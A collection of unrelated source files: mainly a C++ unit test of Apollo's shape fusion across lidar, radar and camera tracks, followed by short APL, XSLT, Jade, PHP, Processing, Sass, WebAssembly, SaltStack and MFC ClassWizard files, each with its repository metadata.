base_object_radar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_radar->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_radar->direction = Eigen::Vector3f(0.707f, 0.707f, 0);
base_object_radar->size = Eigen::Vector3f(2.0f, 1.0f, 3.0f);
std::vector<base::ObjectPtr> radar_objects;
radar_objects.push_back(base_object_radar);
FramePtr radar_frame(new base::Frame);
radar_frame->sensor_info = *radar_sensor_info;
radar_frame->timestamp = 151192277.124567989;
radar_frame->sensor2world_pose = pose;
radar_frame->objects = radar_objects;
SensorFramePtr radar_sensor_frame(new SensorFrame);
radar_sensor_frame->Initialize(radar_frame, radar_sensor);
SensorObjectPtr radar_measurement(
new SensorObject(base_object_radar, radar_sensor_frame));
// camera measurment
base::ObjectPtr base_object_camera(new base::Object);
base_object_camera->center = Eigen::Vector3d(10, 0, 0);
base_object_camera->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_camera->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_camera->direction = Eigen::Vector3f(0.707f, 0.707f, 0);
base_object_camera->size = Eigen::Vector3f(3.5f, 2.5f, 1.5f);
std::vector<base::ObjectPtr> camera_objects;
camera_objects.push_back(base_object_camera);
FramePtr camera_frame(new base::Frame);
camera_frame->sensor_info = *camera_sensor_info;
camera_frame->timestamp = 151192277.124567989;
camera_frame->sensor2world_pose = pose;
camera_frame->objects = camera_objects;
SensorFramePtr camera_sensor_frame(new SensorFrame);
camera_sensor_frame->Initialize(camera_frame, camera_sensor);
SensorObjectPtr camera_measurement(
new SensorObject(base_object_camera, camera_sensor_frame));
PbfShapeFusion shape_fusion(lidar_track);
shape_fusion.UpdateWithMeasurement(lidar_measurement, 100.0);
Eigen::Vector3f size(5.0f, 2.0f, 1.8f);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta, 0.0);
shape_fusion.UpdateWithMeasurement(radar_measurement, 100.0);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta, 0.0);
shape_fusion.UpdateWithMeasurement(camera_measurement, 100.0);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta, 0.0);
}
TEST(PbfShapeFusion, radar_track) {
FLAGS_work_root =
"/apollo/modules/perception/testdata/fusion/pbf_shape_fusion";
FLAGS_obs_sensor_meta_path = "./conf/sensor_meta.config";
FLAGS_obs_sensor_intrinsic_path =
"/apollo/modules/perception/testdata/fusion/pbf_shape_fusion/params";
Eigen::Matrix4d pose;
pose << 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1;
SensorInfoPtr lidar_sensor_info(new base::SensorInfo);
lidar_sensor_info->type = base::SensorType::VELODYNE_64;
lidar_sensor_info->name = "VELODYNE_64";
SensorPtr lidar_sensor(new Sensor(*lidar_sensor_info));
SensorInfoPtr radar_sensor_info(new base::SensorInfo);
radar_sensor_info->type = base::SensorType::LONG_RANGE_RADAR;
radar_sensor_info->name = "LONG_RANGE_RADAR";
SensorPtr radar_sensor(new Sensor(*radar_sensor_info));
SensorInfoPtr camera_sensor_info(new base::SensorInfo);
camera_sensor_info->type = base::SensorType::MONOCULAR_CAMERA;
camera_sensor_info->name = "MONOCULAR_CAMERA";
SensorPtr camera_sensor(new Sensor(*camera_sensor_info));
SensorInfoPtr unknown_sensor_info(new base::SensorInfo);
unknown_sensor_info->type = base::SensorType::MONOCULAR_CAMERA;
unknown_sensor_info->name = "UNKNOWN_SENSOR_TYPE";
SensorPtr unknown_sensor(new Sensor(*unknown_sensor_info));
// radar track
base::ObjectPtr base_track_radar(new base::Object);
base_track_radar->center = Eigen::Vector3d(10, 0, 0);
base_track_radar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_track_radar->theta = 0.0;
base_track_radar->direction = Eigen::Vector3f(1.0f, 0.0f, 0.0f);
base_track_radar->size = Eigen::Vector3f(3.2f, 2.2f, 1.2f);
std::vector<base::ObjectPtr> radar_track_objects;
radar_track_objects.push_back(base_track_radar);
FramePtr radar_track_frame(new base::Frame);
radar_track_frame->sensor_info = *radar_sensor_info;
radar_track_frame->timestamp = 151192277.124567989;
radar_track_frame->sensor2world_pose = pose;
radar_track_frame->objects = radar_track_objects;
SensorFramePtr radar_sensor_frame(new SensorFrame);
radar_sensor_frame->Initialize(radar_track_frame, radar_sensor);
SensorObjectPtr radar_obj(
new SensorObject(base_track_radar, radar_sensor_frame));
TrackPtr radar_track(new Track());
radar_track->Initialize(radar_obj, false);
// lidar measurment
base::ObjectPtr base_object_lidar(new base::Object);
base_object_lidar->center = Eigen::Vector3d(10, 0, 0);
base_object_lidar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_lidar->theta = 0.0;
base_object_lidar->direction = Eigen::Vector3f(1.0f, 0, 0);
base_object_lidar->size = Eigen::Vector3f(5.0f, 2.0f, 1.8f);
std::vector<base::ObjectPtr> lidar_objects;
lidar_objects.push_back(base_object_lidar);
FramePtr lidar_frame(new base::Frame);
lidar_frame->sensor_info = *lidar_sensor_info;
lidar_frame->timestamp = 151192277.124567989;
lidar_frame->sensor2world_pose = pose;
lidar_frame->objects = lidar_objects;
SensorFramePtr lidar_sensor_frame(new SensorFrame);
lidar_sensor_frame->Initialize(lidar_frame, lidar_sensor);
SensorObjectPtr lidar_measurement(
new SensorObject(base_object_lidar, lidar_sensor_frame));
// radar measurment
base::ObjectPtr base_object_radar(new base::Object);
base_object_radar->center = Eigen::Vector3d(10, 0, 0);
base_object_radar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_radar->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_radar->direction = Eigen::Vector3f(0.707f, 0.707f, 0);
base_object_radar->size = Eigen::Vector3f(2.0f, 1.0f, 3.0f);
std::vector<base::ObjectPtr> radar_objects;
radar_objects.push_back(base_object_radar);
FramePtr radar_frame(new base::Frame);
radar_frame->sensor_info = *radar_sensor_info;
radar_frame->timestamp = 151192277.124567989;
radar_frame->sensor2world_pose = pose;
radar_frame->objects = radar_objects;
SensorFramePtr radar_sensor_frame_2(new SensorFrame);
radar_sensor_frame_2->Initialize(radar_frame, radar_sensor);
SensorObjectPtr radar_measurement(
new SensorObject(base_object_radar, radar_sensor_frame_2));
// camera measurment
base::ObjectPtr base_object_camera(new base::Object);
base_object_camera->center = Eigen::Vector3d(10, 0, 0);
base_object_camera->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_camera->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_camera->direction = Eigen::Vector3f(0.707f, 0.707f, 0);
base_object_camera->size = Eigen::Vector3f(3.5f, 2.5f, 1.5f);
std::vector<base::ObjectPtr> camera_objects;
camera_objects.push_back(base_object_camera);
FramePtr camera_frame(new base::Frame);
camera_frame->sensor_info = *camera_sensor_info;
camera_frame->timestamp = 151192277.124567989;
camera_frame->sensor2world_pose = pose;
camera_frame->objects = camera_objects;
SensorFramePtr camera_sensor_frame(new SensorFrame);
camera_sensor_frame->Initialize(camera_frame, camera_sensor);
SensorObjectPtr camera_measurement(
new SensorObject(base_object_camera, camera_sensor_frame));
// unknown measurment
base::ObjectPtr base_object_unknown(new base::Object);
base_object_unknown->center = Eigen::Vector3d(10, 0, 0);
base_object_unknown->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_unknown->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_unknown->direction = Eigen::Vector3f(0.707f, 0.707f, 0);
base_object_unknown->size = Eigen::Vector3f(3.5f, 2.5f, 1.5f);
std::vector<base::ObjectPtr> unknown_objects;
unknown_objects.push_back(base_object_unknown);
FramePtr unknown_frame(new base::Frame);
unknown_frame->sensor_info = *unknown_sensor_info;
unknown_frame->timestamp = 151192277.124567989;
unknown_frame->sensor2world_pose = pose;
unknown_frame->objects = unknown_objects;
SensorFramePtr unknown_sensor_frame(new SensorFrame);
unknown_sensor_frame->Initialize(unknown_frame, unknown_sensor);
SensorObjectPtr unknown_measurement(
new SensorObject(base_object_unknown, unknown_sensor_frame));
PbfShapeFusion shape_fusion(radar_track);
shape_fusion.UpdateWithMeasurement(lidar_measurement, 100.0);
Eigen::Vector3f size(5.0f, 2.0f, 1.8f);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta, 0.0);
shape_fusion.UpdateWithMeasurement(radar_measurement, 100.0);
size << 2.0f, 1.0f, 3.0f;
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta,
SHAPE_FUSION_PI / 4);
shape_fusion.UpdateWithMeasurement(camera_measurement, 100.0);
size << 3.5f, 2.5f, 1.5f;
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta,
SHAPE_FUSION_PI / 4);
shape_fusion.UpdateWithMeasurement(unknown_measurement, 100.0);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta,
SHAPE_FUSION_PI / 4);
EXPECT_TRUE(shape_fusion.Init());
shape_fusion.UpdateWithoutMeasurement("VELODYNE_64", 100.0, 200.0);
EXPECT_EQ(shape_fusion.Name(), "PbfShapeFusion");
}
TEST(PbfShapeFusion, camera_track) {
FLAGS_work_root =
"/apollo/modules/perception/testdata/fusion/pbf_shape_fusion";
FLAGS_obs_sensor_meta_path = "./conf/sensor_meta.config";
FLAGS_obs_sensor_intrinsic_path =
"/apollo/modules/perception/testdata/fusion/pbf_shape_fusion/params";
Eigen::Matrix4d pose;
pose << 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1;
SensorInfoPtr lidar_sensor_info(new base::SensorInfo);
lidar_sensor_info->type = base::SensorType::VELODYNE_64;
lidar_sensor_info->name = "VELODYNE_64";
SensorPtr lidar_sensor(new Sensor(*lidar_sensor_info));
SensorInfoPtr radar_sensor_info(new base::SensorInfo);
radar_sensor_info->type = base::SensorType::LONG_RANGE_RADAR;
radar_sensor_info->name = "LONG_RANGE_RADAR";
SensorPtr radar_sensor(new Sensor(*radar_sensor_info));
SensorInfoPtr camera_sensor_info(new base::SensorInfo);
camera_sensor_info->type = base::SensorType::MONOCULAR_CAMERA;
camera_sensor_info->name = "MONOCULAR_CAMERA";
SensorPtr camera_sensor(new Sensor(*camera_sensor_info));
// camera track
base::ObjectPtr base_track_camera(new base::Object);
base_track_camera->center = Eigen::Vector3d(10.0, 0, 0);
base_track_camera->anchor_point = Eigen::Vector3d(10.0, 0, 0);
base_track_camera->theta = static_cast<float>(SHAPE_FUSION_PI / 2.0);
base_track_camera->direction = Eigen::Vector3f(0.0, 1.0, 0.0);
base_track_camera->size = Eigen::Vector3f(3.1f, 2.1f, 1.1f);
std::vector<base::ObjectPtr> camera_track_objects;
camera_track_objects.push_back(base_track_camera);
FramePtr camera_track_frame(new base::Frame);
camera_track_frame->sensor_info = *camera_sensor_info;
camera_track_frame->timestamp = 151192277.124567989;
camera_track_frame->sensor2world_pose = pose;
camera_track_frame->objects = camera_track_objects;
SensorFramePtr camera_sensor_frame(new SensorFrame);
camera_sensor_frame->Initialize(camera_track_frame, camera_sensor);
SensorObjectPtr camera_obj(
new SensorObject(base_track_camera, camera_sensor_frame));
TrackPtr camera_track(new Track());
camera_track->Initialize(camera_obj, false);
// lidar measurment
base::ObjectPtr base_object_lidar(new base::Object);
base_object_lidar->center = Eigen::Vector3d(10, 0, 0);
base_object_lidar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_lidar->theta = 0.0;
base_object_lidar->direction = Eigen::Vector3f(1, 0, 0);
base_object_lidar->size = Eigen::Vector3f(5.0f, 2.0f, 1.8f);
std::vector<base::ObjectPtr> lidar_objects;
lidar_objects.push_back(base_object_lidar);
FramePtr lidar_frame(new base::Frame);
lidar_frame->sensor_info = *lidar_sensor_info;
lidar_frame->timestamp = 151192277.124567989;
lidar_frame->sensor2world_pose = pose;
lidar_frame->objects = lidar_objects;
SensorFramePtr lidar_sensor_frame(new SensorFrame);
lidar_sensor_frame->Initialize(lidar_frame, lidar_sensor);
SensorObjectPtr lidar_measurement(
new SensorObject(base_object_lidar, lidar_sensor_frame));
// radar measurment
base::ObjectPtr base_object_radar(new base::Object);
base_object_radar->center = Eigen::Vector3d(10, 0, 0);
base_object_radar->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_radar->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_radar->direction = Eigen::Vector3f(0.707f, 0.707f, 0);
base_object_radar->size = Eigen::Vector3f(2.0, 1.0, 3.0);
std::vector<base::ObjectPtr> radar_objects;
radar_objects.push_back(base_object_radar);
FramePtr radar_frame(new base::Frame);
radar_frame->sensor_info = *radar_sensor_info;
radar_frame->timestamp = 151192277.124567989;
radar_frame->sensor2world_pose = pose;
radar_frame->objects = radar_objects;
SensorFramePtr radar_sensor_frame(new SensorFrame);
radar_sensor_frame->Initialize(radar_frame, radar_sensor);
SensorObjectPtr radar_measurement(
new SensorObject(base_object_radar, radar_sensor_frame));
FramePtr radar_frame_2(new base::Frame);
radar_frame_2->sensor_info = *radar_sensor_info;
radar_frame_2->timestamp = 151192278.124567989;
radar_frame_2->sensor2world_pose = pose;
radar_frame_2->objects = radar_objects;
SensorFramePtr radar_sensor_frame_2(new SensorFrame);
radar_sensor_frame_2->Initialize(radar_frame_2, radar_sensor);
SensorObjectPtr radar_measurement_2(
new SensorObject(base_object_radar, radar_sensor_frame_2));
// camera measurment
base::ObjectPtr base_object_camera(new base::Object);
base_object_camera->center = Eigen::Vector3d(10, 0, 0);
base_object_camera->anchor_point = Eigen::Vector3d(10, 0, 0);
base_object_camera->theta = static_cast<float>(SHAPE_FUSION_PI / 4.0);
base_object_camera->direction = Eigen::Vector3f(0.707f, 0.707f, 0.0f);
base_object_camera->size = Eigen::Vector3f(3.5f, 2.5f, 1.5f);
std::vector<base::ObjectPtr> camera_objects;
camera_objects.push_back(base_object_camera);
FramePtr camera_frame(new base::Frame);
camera_frame->sensor_info = *camera_sensor_info;
camera_frame->timestamp = 151192277.124567989;
camera_frame->sensor2world_pose = pose;
camera_frame->objects = camera_objects;
SensorFramePtr camera_sensor_frame_2(new SensorFrame);
camera_sensor_frame_2->Initialize(camera_frame, camera_sensor);
SensorObjectPtr camera_measurement(
new SensorObject(base_object_camera, camera_sensor_frame_2));
PbfShapeFusion shape_fusion(camera_track);
shape_fusion.UpdateWithMeasurement(lidar_measurement, 100.0);
Eigen::Vector3f size(5.0f, 2.0f, 1.8f);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta, 0.0);
shape_fusion.UpdateWithMeasurement(radar_measurement, 100.0);
size << 3.1f, 2.1f, 1.1f;
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta,
SHAPE_FUSION_PI / 2);
shape_fusion.UpdateWithMeasurement(camera_measurement, 100.0);
size << 3.5f, 2.5f, 1.5f;
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta,
SHAPE_FUSION_PI / 4);
shape_fusion.UpdateWithMeasurement(radar_measurement_2, 100.0);
EXPECT_LT(
(size - shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->size)
.norm(),
1e-6);
EXPECT_FLOAT_EQ(
shape_fusion.GetTrack()->GetFusedObject()->GetBaseObject()->theta,
SHAPE_FUSION_PI / 4);
}
} // namespace fusion
} // namespace perception
} // namespace apollo
| C++ | 5 | seeclong/apollo | modules/perception/fusion/lib/data_fusion/shape_fusion/pbf_shape_fusion/pbf_shape_fusion_test.cc | [
"Apache-2.0"
] |
tally ← {⍬⍴(⍴⍵),1}
x ← ⍉ 4 5 3 ⍴ ⍳ 10
⎕ ← tally x ⍝ -> 3
⎕ ← ≢x ⍝ -> 3
0
| APL | 2 | melsman/apltail | tests/tally.apl | [
"MIT"
] |
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml" encoding="UTF-8"/>
<xsl:template match="TEST">
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<p>You should see error text above this</p>
<foo:bar />
<p>ERROR? this, and nothing below it should be rendered</p>
</body>
</html>
</xsl:template>
</xsl:stylesheet> | XSLT | 3 | zealoussnow/chromium | third_party/blink/web_tests/fast/xsl/resources/xslt-missing-namespace-in-xslt.xsl | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
mixin tournamentTileMixin(tournament)
- showLink = false
// show link when tournament starting/ended or in 1 day to start
if tournament.state == 'initializing'
- now = new Date().getTime()
- time = ((new Date(tournament.startDate).getTime() - now)/(24*3600*1000) + 0.99)|0
if time <= 1
- showLink = true
else
- showLink = true
a.ai-league-btn.tile(href=showLink ? `/play/ladder/${tournament.slug}/clan/${tournament.clan}?tournament=${tournament._id}`: 'javascript: void(0)', title=tournament.description)
// do not show preview image for initializing tournaments
if tournament.state != 'initializing' && view.ladderImageMap[tournament.levelOriginal]
img.level-image(src=view.ladderImageMap[tournament.levelOriginal], alt=tournament.name).img-rounded
else
img.level-image(src="/images/pages/play/ladder/multiplayer_notext.jpg", alt=tournament.name).img-rounded
h3.dynamic-level-name.overlay-text= tournament.displayName
.tile-text-backdrop
.stats-text-container
.overlay-text.stats-text
if tournament.state != 'initializing'
span= tournament.slug
.play-text-container
.overlay-text.play-text
if tournament.state == 'initializing'
- now = new Date().getTime()
- time = (new Date(tournament.startDate).getTime() - now)/(24*3600*1000)|0
span(data-i18n="tournament.estimate_days", data-i18n-options={time})
else if tournament.state == 'starting'
span(data-i18n="common.play")
else if tournament.state == 'ended'
span(data-i18n="tournament.view_results")
| Jade | 4 | Chaboi45/codecombat-chaboi | app/templates/courses/tournament-tile-mixin.jade | [
"CC-BY-4.0",
"MIT"
] |
<span><?php echo "string" ?></span> | HTML+PHP | 1 | jodysimpson/plugin-php | tests/extensions/extension.phtml | [
"MIT"
] |
// Array of Objects
// Learning Processing
// The Coding Train / Daniel Shiffman
// https://thecodingtrain.com/Courses/learning-processing/9-arrays/9.3-array-of-objects.html
// https://youtu.be/-sSRHRfK2EU
Bubble[] bubbles = new Bubble[2];
void setup() {
size(640, 360);
bubbles[0] = new Bubble(64);
bubbles[1] = new Bubble(64);
}
void draw() {
background(255);
bubbles[0].ascend();
bubbles[0].display();
bubbles[0].top();
bubbles[1].ascend();
bubbles[1].display();
bubbles[1].top();
}
| Processing | 4 | aerinkayne/website | Tutorials/Processing/9.3-array-of-objects/Processing/sketch_9_3_Array_of_Objects/sketch_9_3_Array_of_Objects.pde | [
"MIT"
] |
{% set result = 'AC:DE:48' | gen_mac() %}
{% include 'jinja_filters/common.sls' %}
| SaltStack | 2 | byteskeptical/salt | tests/integration/files/file/base/jinja_filters/network_gen_mac.sls | [
"Apache-2.0"
] |
(module
(type $i32_i32_=>_none (func (param i32 i32)))
(type $i32_=>_none (func (param i32)))
(type $i32_=>_i32 (func (param i32) (result i32)))
(type $none_=>_none (func))
(type $i32_i32_i32_i32_=>_none (func (param i32 i32 i32 i32)))
(type $i32_i32_=>_i32 (func (param i32 i32) (result i32)))
(import "env" "abort" (func $~lib/builtins/abort (param i32 i32 i32 i32)))
(global $~lib/rt/stub/startOffset (mut i32) (i32.const 0))
(global $~lib/rt/stub/offset (mut i32) (i32.const 0))
(global $~lib/rt/__rtti_base i32 (i32.const 144))
(global $~lib/memory/__heap_base i32 (i32.const 172))
(memory $0 1)
(data (i32.const 12) "<\00\00\00\00\00\00\00\00\00\00\00\01\00\00\00(\00\00\00A\00l\00l\00o\00c\00a\00t\00i\00o\00n\00 \00t\00o\00o\00 \00l\00a\00r\00g\00e\00\00\00\00\00")
(data (i32.const 76) "<\00\00\00\00\00\00\00\00\00\00\00\01\00\00\00\1e\00\00\00~\00l\00i\00b\00/\00r\00t\00/\00s\00t\00u\00b\00.\00t\00s\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00")
(data (i32.const 144) "\03\00\00\00 \00\00\00\00\00\00\00 \00\00\00\00\00\00\00\00\00\00\00\00\00\00\00")
(table $0 1 funcref)
(elem $0 (i32.const 1))
(export "__new" (func $~lib/rt/stub/__new))
(export "__pin" (func $~lib/rt/stub/__pin))
(export "__unpin" (func $~lib/rt/stub/__unpin))
(export "__collect" (func $~lib/rt/stub/__collect))
(export "__rtti_base" (global $~lib/rt/__rtti_base))
(export "memory" (memory $0))
(start $~start)
(func $~lib/rt/stub/maybeGrowMemory (param $0 i32)
(local $1 i32)
(local $2 i32)
(local $3 i32)
(local $4 i32)
(local $5 i32)
memory.size
local.set $1
local.get $1
i32.const 16
i32.shl
i32.const 15
i32.add
i32.const 15
i32.const -1
i32.xor
i32.and
local.set $2
local.get $0
local.get $2
i32.gt_u
if
local.get $0
local.get $2
i32.sub
i32.const 65535
i32.add
i32.const 65535
i32.const -1
i32.xor
i32.and
i32.const 16
i32.shr_u
local.set $3
local.get $1
local.tee $4
local.get $3
local.tee $5
local.get $4
local.get $5
i32.gt_s
select
local.set $4
local.get $4
memory.grow
i32.const 0
i32.lt_s
if
local.get $3
memory.grow
i32.const 0
i32.lt_s
if
unreachable
end
end
end
local.get $0
global.set $~lib/rt/stub/offset
)
(func $~lib/rt/common/BLOCK#set:mmInfo (param $0 i32) (param $1 i32)
local.get $0
local.get $1
i32.store
)
(func $~lib/rt/stub/__alloc (param $0 i32) (result i32)
(local $1 i32)
(local $2 i32)
(local $3 i32)
(local $4 i32)
local.get $0
i32.const 1073741820
i32.gt_u
if
i32.const 32
i32.const 96
i32.const 33
i32.const 29
call $~lib/builtins/abort
unreachable
end
global.get $~lib/rt/stub/offset
local.set $1
global.get $~lib/rt/stub/offset
i32.const 4
i32.add
local.set $2
local.get $0
local.set $3
local.get $3
i32.const 4
i32.add
i32.const 15
i32.add
i32.const 15
i32.const -1
i32.xor
i32.and
i32.const 4
i32.sub
local.set $4
local.get $2
local.get $4
i32.add
call $~lib/rt/stub/maybeGrowMemory
local.get $1
local.get $4
call $~lib/rt/common/BLOCK#set:mmInfo
local.get $2
)
(func $~lib/rt/common/OBJECT#set:gcInfo (param $0 i32) (param $1 i32)
local.get $0
local.get $1
i32.store offset=4
)
(func $~lib/rt/common/OBJECT#set:gcInfo2 (param $0 i32) (param $1 i32)
local.get $0
local.get $1
i32.store offset=8
)
(func $~lib/rt/common/OBJECT#set:rtId (param $0 i32) (param $1 i32)
local.get $0
local.get $1
i32.store offset=12
)
(func $~lib/rt/common/OBJECT#set:rtSize (param $0 i32) (param $1 i32)
local.get $0
local.get $1
i32.store offset=16
)
(func $~lib/rt/stub/__new (param $0 i32) (param $1 i32) (result i32)
(local $2 i32)
(local $3 i32)
local.get $0
i32.const 1073741804
i32.gt_u
if
i32.const 32
i32.const 96
i32.const 86
i32.const 30
call $~lib/builtins/abort
unreachable
end
i32.const 16
local.get $0
i32.add
call $~lib/rt/stub/__alloc
local.set $2
local.get $2
i32.const 4
i32.sub
local.set $3
local.get $3
i32.const 0
call $~lib/rt/common/OBJECT#set:gcInfo
local.get $3
i32.const 0
call $~lib/rt/common/OBJECT#set:gcInfo2
local.get $3
local.get $1
call $~lib/rt/common/OBJECT#set:rtId
local.get $3
local.get $0
call $~lib/rt/common/OBJECT#set:rtSize
local.get $2
i32.const 16
i32.add
)
(func $~lib/rt/stub/__pin (param $0 i32) (result i32)
local.get $0
)
(func $~lib/rt/stub/__unpin (param $0 i32)
nop
)
(func $~lib/rt/stub/__collect
nop
)
(func $~start
global.get $~lib/memory/__heap_base
i32.const 4
i32.add
i32.const 15
i32.add
i32.const 15
i32.const -1
i32.xor
i32.and
i32.const 4
i32.sub
global.set $~lib/rt/stub/startOffset
global.get $~lib/rt/stub/startOffset
global.set $~lib/rt/stub/offset
)
)
| WebAssembly | 3 | romdotdog/assemblyscript | tests/compiler/rt/runtime-stub-export.untouched.wat | [
"Apache-2.0"
] |
img.responsive
max-width: 100%
height: auto
.q-video
position: relative
overflow: hidden
border-radius: inherit
iframe,
object,
embed
width: 100%
height: 100%
&--responsive
height: 0
iframe,
object,
embed
position: absolute
top: 0
left: 0
| Sass | 3 | ygyg70/quasar | ui/src/components/video/QVideo.sass | [
"MIT"
] |
#Signature file v4.1
#Version 5.17
| Standard ML | 0 | timfel/netbeans | platform/libs.asm/nbproject/org-netbeans-libs-asm.sig | [
"Apache-2.0"
] |
; CLW file contains information for the MFC ClassWizard
[General Info]
Version=1
LastClass=CMainFrame
LastTemplate=CDialog
NewFileInclude1=#include "stdafx.h"
NewFileInclude2=#include "Resourcer.h"
LastPage=0
ClassCount=6
Class1=CResourcerApp
Class2=CClassHeirarchy
Class3=CUpdateSettings
Class4=CMainFrame
ResourceCount=5
Resource1=IDD_CLASS_HEIRARCHY
Resource2=IDD_UPDATE_SETTINGS
Class5=CClientUpdate
Class6=CAboutDlg
Resource3=IDD_ABOUTBOX
Resource4=IDD_CLIENT_UPDATE
Resource5=IDR_MAINFRAME
[CLS:CResourcerApp]
Type=0
HeaderFile=Resourcer.h
ImplementationFile=Resourcer.cpp
Filter=N
BaseClass=CWinApp
VirtualFilter=AC
LastObject=ID_APP_ABOUT
[CLS:CMainFrame]
Type=0
HeaderFile=MainFrm.h
ImplementationFile=MainFrm.cpp
Filter=T
LastObject=ID_EDIT_SELECT_ALL
BaseClass=CMDIFrameWnd
VirtualFilter=fWC
[CLS:CAboutDlg]
Type=0
HeaderFile=Resourcer.cpp
ImplementationFile=Resourcer.cpp
Filter=D
LastObject=ID_VIEW_PORTLIBRARIES
[DLG:IDD_ABOUTBOX]
Type=1
Class=CAboutDlg
ControlCount=4
Control1=IDC_STATIC,static,1342177283
Control2=IDC_STATIC,static,1342308480
Control3=IDC_STATIC,static,1342308352
Control4=IDOK,button,1342373889
[MNU:IDR_MAINFRAME]
Type=1
Class=CMainFrame
Command1=ID_FILE_NEW
Command2=ID_FILE_OPEN
Command3=ID_FILE_PRINT_SETUP
Command4=ID_FILE_MRU_FILE1
Command5=ID_APP_EXIT
Command6=ID_VIEW_TOOLBAR
Command7=ID_VIEW_STATUS_BAR
Command8=ID_VIEW_CLASSHEIRARCHY
Command9=ID_VIEW_UPDATESETTINGS
Command10=ID_VIEW_PORTLIBRARIES
Command11=ID_APP_ABOUT
CommandCount=11
[ACL:IDR_MAINFRAME]
Type=1
Class=CMainFrame
Command1=ID_EDIT_SELECT_ALL
Command2=ID_EDIT_COPY
Command3=ID_FILE_NEW
Command4=ID_FILE_OPEN
Command5=ID_FILE_PRINT
Command6=ID_FILE_SAVE
Command7=ID_EDIT_PASTE
Command8=ID_EDIT_UNDO
Command9=ID_EDIT_CUT
Command10=ID_NEXT_PANE
Command11=ID_PREV_PANE
Command12=ID_EDIT_COPY
Command13=ID_EDIT_PASTE
Command14=ID_EDIT_CUT
Command15=ID_EDIT_UNDO
CommandCount=15
[DLG:IDD_CLASS_HEIRARCHY]
Type=1
Class=CClassHeirarchy
ControlCount=2
Control1=IDOK,button,1342242817
Control2=IDC_TREE1,SysTreeView32,1350631431
[CLS:CClassHeirarchy]
Type=0
HeaderFile=ClassHeirarchy.h
ImplementationFile=ClassHeirarchy.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=IDC_TREE1
[DLG:]
Type=1
Class=?
ControlCount=5
Control1=IDCANCEL,button,1342242816
Control2=IDC_PROGRESS1,msctls_progress32,1350565888
Control3=IDC_PROGRESS2,msctls_progress32,1350565888
Control4=IDC_FILESTATUS,static,1342308352
Control5=IDC_STATUS,static,1342308352
[CLS:CClientUpdate]
Type=0
HeaderFile=ClientUpdate.h
ImplementationFile=ClientUpdate.cpp
BaseClass=CDialog
[DLG:IDD_CLIENT_UPDATE]
Type=1
Class=?
ControlCount=5
Control1=IDCANCEL,button,1342242816
Control2=IDC_PROGRESS1,msctls_progress32,1350565888
Control3=IDC_PROGRESS2,msctls_progress32,1350565888
Control4=IDC_FILESTATUS,static,1342308352
Control5=IDC_STATUS,static,1342308352
[DLG:IDD_UPDATE_SETTINGS]
Type=1
Class=CUpdateSettings
ControlCount=11
Control1=IDC_CHECK1,button,1342242819
Control2=IDC_EDIT1,edit,1350631552
Control3=IDC_EDIT4,edit,1350631584
Control4=IDC_EDIT2,edit,1350631552
Control5=IDC_EDIT3,edit,1350631552
Control6=IDOK,button,1342242817
